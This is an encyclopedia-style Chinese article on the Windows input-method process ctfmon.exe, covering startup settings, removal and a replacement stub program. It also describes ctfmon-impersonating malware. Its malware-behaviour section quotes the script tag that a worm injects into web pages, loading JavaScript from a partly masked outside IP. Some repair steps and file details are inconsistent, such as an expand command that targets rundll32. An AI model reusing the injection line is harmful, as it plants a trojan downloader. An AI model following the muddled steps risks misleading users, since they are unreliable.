ctfmon.exe

ctfmon.exe

ctfmon.exe是Microsoft Office產品套裝的一部分,是有關輸入法的一個可執行程式。它可以選擇用戶文字輸入程式,和微軟Office XP語言條。這不是純粹的系統程式,但是如果終止它,可能會導致不可知的問題。另外,ctfmon.exe可能被感染上木馬而成為病毒程式。

基本介紹

  • 軟體名稱:ctfmon.exe
  • 開發商:Microsoft Corp
  • 軟體平台:Microsoft Office Suite
  • 軟體語言:簡體中文
  • 軟體大小:19KB
  • 軟體授權免費軟體
  • 常見錯誤:未知N/A
  • 檔案類型:.exe
  • 運行環境:Win2003,WinXP,win7
功能作用,設定方法,關閉方法,安全相關,快速排查,病毒介紹,軟體修復,下載修復,病毒行為,檔案介紹,

功能作用

Ctfmon.exe 監視活動視窗,並為語音識別、書寫識別、鍵盤、翻譯和其他中文可選用戶輸入方法技術提供文本輸入服務支持。
缺少ctfmon進程可能造成的影響
網路上有大量主張中止ctfmon進程的討論,但是在windows vista,windows 2008,windows 7中,缺少ctfmon進程會引起輸入法的不正常行為,常見的情況是用戶忽然無法在輸入法開啟的情況下,以按空格的方式輸入可選字的第一個字的情況,剛按下空格時,輸入法即被切換為英文。
在這種情況下,仍然可以用數字鍵來選擇要輸入的文字。
解決辦法是重新運 ctfmon 進程。方法是:
⒈點擊“開始”選單,選擇“運行”。
⒉輸入:ctfmon.exe
⒊點擊“運行”按鈕。

設定方法

程式ctfmon.exe,XP下系統默認情況下是隨電腦開機而自動啟動的(Win7雖然也有此檔案,但並不會隨系統自動啟動)。如果你設定了ctfmon.exe不隨機自動啟動,進入系統後你的電腦系統列中的輸入法圖示(即語言欄)就不見了。
要設定ctfmon.exe隨機自動啟動,可以單擊“開始”→;“運行”→;輸入“msconfig”(引號不要輸入),回車→;打開“系統配置使用程式”視窗→;選擇“啟動”頁,找到ctfmon項並在其前面打上鉤,按“套用”、“確定”,重啟機器即可生效。
家裡系統是Windows7的,不能像XP的選項操作,如果ctfmon.exe並沒有刪除,可工具列選項上沒有語言欄的選項的話,打開操作面板\區域和語言\鍵盤和語言\更改鍵盤\語言欄,將“停靠於系統列”和“在系統列中顯示其他語言欄圖示”勾上即可。
如果在“啟動”頁,找不到ctfmon項,說明註冊表中已將該項刪除,可以單擊“開始”——>;“運行”——>;輸入“regedit”(引號不要輸入),回車——>;打開“註冊表編輯器”,定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,在視窗的右側新建名字為ctfmon.exe的字元串值(REG_SZ),並將其值設定為“C:\WINDOWS\system32\ctfmon.exe”,然後關閉註冊表編輯器,再執行前一步的操作即可。
當語言欄消失,且無法通過工具列恢復時,我們也可以從系統盤中的\WINDOWS\system32\ctfmon.exe找到ctfmon.exe檔案並複製,然後點擊“開始”選單,找到啟動選項,右擊啟動——打開,然後把複製的ctfmon.exe檔案貼上到打開的啟動資料夾中。
如果不運行高級文字服務,Ctfmon.exe 幾乎不使用系統資源。高級文字服務是 Ctfmon.exe 通過 TIP 控制的輸入技術(語音識別、書寫識別和輸入方法編輯器)。
Ctfmon.exe 是負責控制中文可選用戶輸入方法技術的檔案。它啟動語言欄組件(在系統列中),並一直在後台運行,甚至在退出 Office XP 程式之後也是如此。每次啟動 Windows 時,它也會啟動,並一直在後台運行,而與 Office XP 程式是否啟動無關。不能根據需要載入和卸載中文可選用戶輸入方法系統。在安裝 Office XP 中文可選用戶輸入方法組件後,Ctfmon.exe 在 Windows 會話期間繼續在後台運行。
如何解決關閉 ctfmon.exe後出現輸入法切換快捷鍵亂掉
注意:以下的處理方法不能保證完全不會危害您的計算機。請在採用之前認真考慮。
如果你的win2000系統裝了officeXP或以上版本,它會在你和系統里留下一個ctfmon.exe檔案,並自動啟動運行,他困擾了無數的網友。
首先我們來說一下它對用戶界面和操作體驗的一些影響。
⒈ 無論打開什麼視窗,總會彈出一個輸入法工具體,並且默認是中文輸入。
⒉ 它替換了原來的區域和輸入法設定,並以一個文字服務的設定取而代之,而且不能設定默認的輸入法。
⒊ 結束掉原來的輸入法工具進程internat.exe,並令他不能在開機時起動。
⒋ 將自己放在開機時啟動的程式列表中,除非修改註冊表,否則無法去除。
⒌ 像病毒一樣有重生能力,當你把ctfmon.exe刪了以後,他又會隨著Office的啟動而重新生成。
⒍ 當你結束了ctfmon.exe後,經常會出現輸入法切換快捷鍵亂掉的情況。
第一步:右擊系統列空白處,點“任務管理器”。
第二步:找到ctfmon.exe,並終止它。
第三步:在系統目錄下的system32目錄下找到ctfmon.exe,刪除掉。
第四步:寫一個最簡單的api程式(代碼見附錄),編譯後放到ctfmon.exe所在目錄,並更名為ctfmon.exe。
第五步:點擊“開始”選單,點擊“運行”,輸入internat.exe後點擊確定。
第六步:重起計算機。
附:
⒈ 程式代碼如下:(注意:以下程式需要用Visual C++編譯。)
#include <windows.h>
int APIENTRY WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{HANDLE m_hMutex = CreateMutex(NULL,TRUE,"ctfmon.exe");
if(GetLastError() != ERROR_ALREADY_EⅪSTS)
while ⑴ Sleep(INFINITE);
return 0;}
⒉ 如果執行後發現word的輸入法無法正確使用,解決辦法如下:
第一步:打開word
第二步:點擊“工具”選單中的“選項”子選單。點擊“編輯”選項卡。
第三步:清除“輸入法控制處於活動狀態”的複選。點擊“確定”
第四步:點擊“工具”選單中“語言”子選單中的“設定語言”項。
第五步:在列表中選擇“英語 美國”,點擊確定。
第六步:關閉Word,重啟計算機。
另外的解決方法:開始-運行-輸入“regedit”-找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts”-在下面的分支找到美國英語刪除就行了

關閉方法

如果使用了非微軟拼音輸入法,那么就沒必要隨即開啟ctfmon.exe程式,讓它占用有限的資源。比如習慣使用搜狗拼音輸入法的用戶,如果安裝了Office軟體,就會默認安裝微軟的拼音輸入法,對不使用它的用戶完全可以設法關閉它!具體的步驟是:開始→控制臺→添加或刪除程式→更改或刪除程式→點選MOffice相關程式項→更改→選中添加或刪除功能→繼續→安裝選項→點開Office 共享功能→點擊微軟拼音輸入法不可用→繼續。由於安裝Office程式的時候是默認安裝微軟輸入法,那么它的ctfmon.exe程式就會隨機啟動,如要關閉它可以在註冊表中刪除隨機啟動項即可,在運行中輸入:regedit 回車打開註冊表定位到以下路徑(刪除ctfmon鍵值即可):HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe

安全相關

快速排查

如果你懷疑此進程有些不正常,那么我們用下面的一些方法快速的察覺出Ctfmon.exe相關的病毒,若發現情況建議馬上更新防毒軟體最新病毒庫並對電腦全盤掃描。
1、如果發現Ctfmon.exe不在System32目錄下;
2、如果此進程發現占用資源太多;
3、如果Win7系統運行了Ctfmon.exe;

病毒介紹

2010年,可牛安全中心截獲到了一種替換系統ctfmon.exe的病毒(潛行者病毒)。隨後,“ctfmon.exe病毒”開始呈爆發式傳播,牢牢占據病毒排行榜的第一位。
“感染系統ctfmon.exe”檔案病毒爆發,數百萬網遊玩家可能被盜號!
“該病毒”以感染Windows系統檔案ctfmon.exe作為跳板,繞過防毒軟體及網遊保護系統。一旦受感染的系統檔案被網路遊戲載入到記憶體,便會載入各種流行網遊盜號木馬(特徵是擴展名為drv),盜取《天龍八部》,《劍網三》,《QQ地下城勇士》,《CF》等流行網遊的賬號。同時,也會使遊戲過程中頻繁卡機
截止今天,可牛防毒安全中心監測到有數百萬網遊玩家的電腦感染了ctfmon.exe病毒,造成ctfmon.exe等系統檔案丟失,以及網遊賬號被盜。
盜號木馬偽裝ctfmon.exe等系統檔案伺機盜取網遊賬號
2009年開始,木馬感染系統檔案成為新趨勢。“系統檔案替換病毒”的出現,意味著網遊盜號產業進一步細化分工,可以為了繞過安全軟體和網遊保護而製作一種獨立病毒。在過去,木馬為了侵入網遊,必須在啟動項中進行載入,所以安全軟體可以通過啟動項檢查發現是否有木馬進入系統。而像“ctfmon.exe病毒”這種通過感染ctfmon.exe檔案,從而將木馬載入進網遊進程的形勢,可以繞過大多數安全軟體的檢測。這也是“系統檔案感染病毒” 至今沒有被主流殺軟查殺的原因。

軟體修復

多數防毒軟體對“潛行者”病毒無法查殺,或查殺後造成系統找不到ctfmon.exe檔案,導致運行網遊時彈出系統檔案丟失提示。從百度、谷歌等搜尋引擎搜尋量情況來看,網友對ctfmon.exe檔案的搜尋量持續回升, 也可以確定網友對防毒軟體只管查殺,不管修復是如此無奈。
可牛防毒安全中心建議,《天龍八部》、《劍網3》、《QQ地下城與勇士》、《穿越火線》等網遊的玩家,立即運行《可牛免費防毒》進行全盤掃描,檢測系統是否已經被“ctfmon.exe病毒”入侵。
如果因其他殺軟查殺,導致電腦出現ctfmon.exe檔案丟失,可以使用ctfmon.exe可牛系統檔案修復工具進行系統檔案完美修復!

下載修復

步驟1:將Windows XP安裝 光碟插入你的光碟機,然後依次點擊“開始→運行”。
步驟2:在“運行”視窗中輸入“expand x:\i386\rundll32.ex_c:\windows\system32 \rundll32.exe”命令並回車執行(其中“x”為光碟機的盤符)。
步驟3:修復完畢後,重新啟動系統即可。

病毒行為

這是一個蠕蟲病毒。(蠕蟲病毒比以前少了很多,但對區域網路的影響會很大)
該病毒運行後,會指定的網路上下載病毒程式,並且會搜尋區域網路內機器,以弱口令進行嘗試性連線
一旦連線成功,則判斷該機器弱口令是否有足夠的許可權,有則向該遠程機器傳送惡意數據,然後利用windows漏洞來下載程式,予以執行.
⒈病毒運行後,產生以下病毒檔案
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
⒉添加病毒啟動項
啟動項名:svchost對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
⒊病毒會觸發taimpo.bat病毒檔案,用來關閉"360安全衛士",使用戶的安全性能降低.
⒋病毒會檢測連線的遠程機器,當遠程機器的登錄木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到用戶機器上.
⒌遍歷磁碟,查找*.htm、*.PHP、*.ASP等網頁檔案,開始感染,插入一段JS代碼:
script language=javascript src=http://218.**.**.248/qq.js
這段腳本病毒,可能會被用作下載更多的木馬程式,利用蠕蟲攻擊傳播,利用下載器種植木馬,是目前黑客偷東西慣用的手法。
解決方案:
怕麻煩直接去下載專殺工具
⒈刪除病毒生成的三個檔案,可使用清理專家的檔案粉碎器完成操作。
%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%預設是c:\windows目錄)
%WINDIR%\ SYSTEM32\taimpo.txt
%Documents and Settings%\Administrator\桌面\ctfmon.exe(偽裝成輸入法的程式名)
⒉使用金山衛士的修復功能,將病毒添加的註冊表啟動項刪除。
防範措施:
⒈最最重要的,是給系統打補丁,登錄系統一定要使用口令,就算是電腦只有自己一個人用,也需要安全的登錄口令,口令不能太簡單,以免被遠程攻擊工具猜解。(因為只要電腦接入網際網路,就能給木馬以機會.)
其它方案基本是相通的,不在綴述!
中毒後的解決辦法
將防毒軟體升級到最近版本進行查殺,如果查殺完畢後發現輸入法無法正常使用的情況,請下載附屬檔案中的檔案,將其解壓後複製到“C:\Windows\system32\” 資料夾即可解決。
備註:如果 ctfmon.exe 位於在目錄 C:\Windows下,那么威脅危險度是 70%。檔案大小是 2,811,732 位元組 (占總出現比率 37%),20,062 位元組,50,670 位元組,18,353 位元組,95,744 位元組。應用程式是不可見的。這是個不知名的檔案存放於 Windows 目錄。這個不是 Windows 核心檔案。沒有進程的相關資料。ctfmon.exe 是有能力可以 隱藏自身,監控應用程式。

檔案介紹

ctfmon.exe (5.1.2600.1106)
名字:
Windows XP Home Edition,Deutsch
執照:
商業
檔案道路:
C:\WINDOWS\system32\dllcache \ ctfmon.exe
檔案日期:
2002-08-29 14:00:00
版本:
5.1.2600.1106
檔案大小:
13.312 位元組
CRC32:
2E4072CA
MD5:
E5EE 2F47 00B6 A85F 0D45 A18C 67DA 500F
SHA1:
1D1B F316 C6D3 E91F 8975 60FC E77F 038A FB72 56FF
公司名稱:
Microsoft Corporation
檔案描述:
CTF Loader
檔案作業系統:
Windows NT,Windows 2000,Windows XP,Windows 2003
檔案類型:
Dynamic Link Library (DLL)
檔案版本:
5.1.2600.1106
內部名:
CTFMON
法律著作權:
©Microsoft Corporation. All rights reserved.
原始的檔案名稱:
CTFMON.EXE
產品名稱:
Microsoft Windows Operating System
產品版本:
5.1.2600.1106

相關詞條

熱門詞條

聯絡我們